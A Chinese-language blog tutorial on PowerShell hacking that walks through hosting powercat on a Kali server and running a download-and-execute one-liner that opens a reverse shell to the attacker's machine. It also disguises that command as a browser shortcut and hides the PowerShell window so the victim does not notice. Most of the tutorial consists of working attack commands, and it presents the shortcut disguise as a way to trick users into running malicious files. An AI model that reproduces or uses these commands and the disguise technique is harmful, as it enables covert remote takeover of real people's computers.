【视频讲解】PowerShell中的黑客技术

作者：FancyPig | 发布时间：2022-09-23 12:20:22 | 更新时间：2023-02-05 17:07:59

相关阅读

data-postsbox="{"id":12044,"title":"如何通过一个exe文件远程控制整台计算机？","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4429,"comment_count":16,"category":"knowledge","is_forum_post":false}">{"id":12044,"title":"如何通过一个exe文件远程控制整台计算机？","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4429,"comment_count":16,"category":"knowledge","is_forum_post":false}

data-postsbox="{"id":2373,"title":"【视频教学】如何远程控制任何安卓设备？","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":21850,"comment_count":1000,"category":"sg","is_forum_post":false}">{"id":2373,"title":"【视频教学】如何远程控制任何安卓设备？","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":21850,"comment_count":1000,"category":"sg","is_forum_post":false}

data-postsbox="{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的？反弹shell了解一下！","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}">{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的？反弹shell了解一下！","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}

data-postsbox="{"id":8451,"title":"如何通过发送一个PDF文件远程控制整台计算机？","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}">{"id":8451,"title":"如何通过发送一个PDF文件远程控制整台计算机？","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}

data-postsbox="{"id":9833,"title":"如何远程控制任意安卓设备2.0(androRAT)","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9228,"comment_count":32,"category":"knowledge","is_forum_post":false}">{"id":9833,"title":"如何远程控制任意安卓设备2.0(androRAT)","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9228,"comment_count":32,"category":"knowledge","is_forum_post":false}

data-postsbox="{"id":10680,"title":"黑客是如何黑进手机摄像头？CamPhish了解一下","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/02/20220227055218920.png","cover_video":"","views":13867,"comment_count":28,"category":"knowledge","is_forum_post":false}">{"id":10680,"title":"黑客是如何黑进手机摄像头？CamPhish了解一下","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/02/20220227055218920.png","cover_video":"","views":13867,"comment_count":28,"category":"knowledge","is_forum_post":false}

视频讲解

备用播放线路

图文讲解

Powershell可以做什么？

比方说创建一个文件

New-Item -Path '.\newfile.txt' -ItemType File

可以看到文件成功创建了

当然，Powershell能玩的不止这些！

你还可以下载文件到本地

譬如，我们下载内网的资源

wget "http://192.168.0.192/default/ps1" -outfile "C:\users\loiliangyang\Desktop\default.ps1"

我们可以看到运行完命令后，文件已经下载到桌面上了

使用Kali linux托管文件

启动Apache服务

systemctl start apache2.service

下载要投递的恶意文件

使用kali linux下载我们要投递的恶意文件

wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

将我们想要发给目标用户的文件存储在/var/www/html目录下

cp powercat.ps1 /var/www/html/powercat.ps1

如何让powershell下载并运行文件？

通常我们使用powershell下载文件，使用下面的命令就好了

powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1')"

这里我们想要他下载完成后运行，则可以使用;进行下一步操作

powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"

这里相当于要完成一个反弹shell，将终端转到192.168.0.192的1337端口，因此在运行下面命令前，我们需要到kali上进行设置

nc -nlvp 1337

然后在运行刚才的windows powershell命令

之后神奇的事情就发生了，我们可以使用kali linux向windows终端发送命令

譬如我们想创建一个文件告诉电脑已经被入侵

我们进入windows的桌面位置

cd Desktop

然后创建一个you have been hacked by mr hacker loi（你已经被hackerloi黑了）的hacked.txt文件

echo "you have been hacked by mr hacker loi" > hacked.txt

我们甚至还可以使用notepad命令打开这个文件

notepad hacked.txt

这看起来有些嚣张了……返回windows电脑，可以看到弹出的txt文本提示电脑已经被黑了

小技巧：使用快捷方式混淆

很多热心网友表示，用户通常不会自己打开这些恶意文件，那么也不是没有办法，我们可以将其伪装成一些特定的快捷方式，比方说浏览器

我们可以右键属性看下打开浏览器实际会访问的目标

可以看到目标居然是我们刚才的命令

powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"

这里powershell.exe会根据你电脑实际的路径进行补全，譬如变成

C:\Windows\System32\WindowsPowerShell\V1.0\powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"

但是我们点击这个伪装的快捷方式

会发现有一个很假的事情，就是这个黑色的弹窗会一直保留

那么如何进行优化呢？很简单！

在之前的powershell.exe命令后面增加-w h即可隐藏窗口

C:\Windows\System32\WindowsPowerShell\V1.0\powershell.exe -w h -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"

这样再打开就会自动隐藏了，是不是很有趣呢？

标签：黑客技术, powershell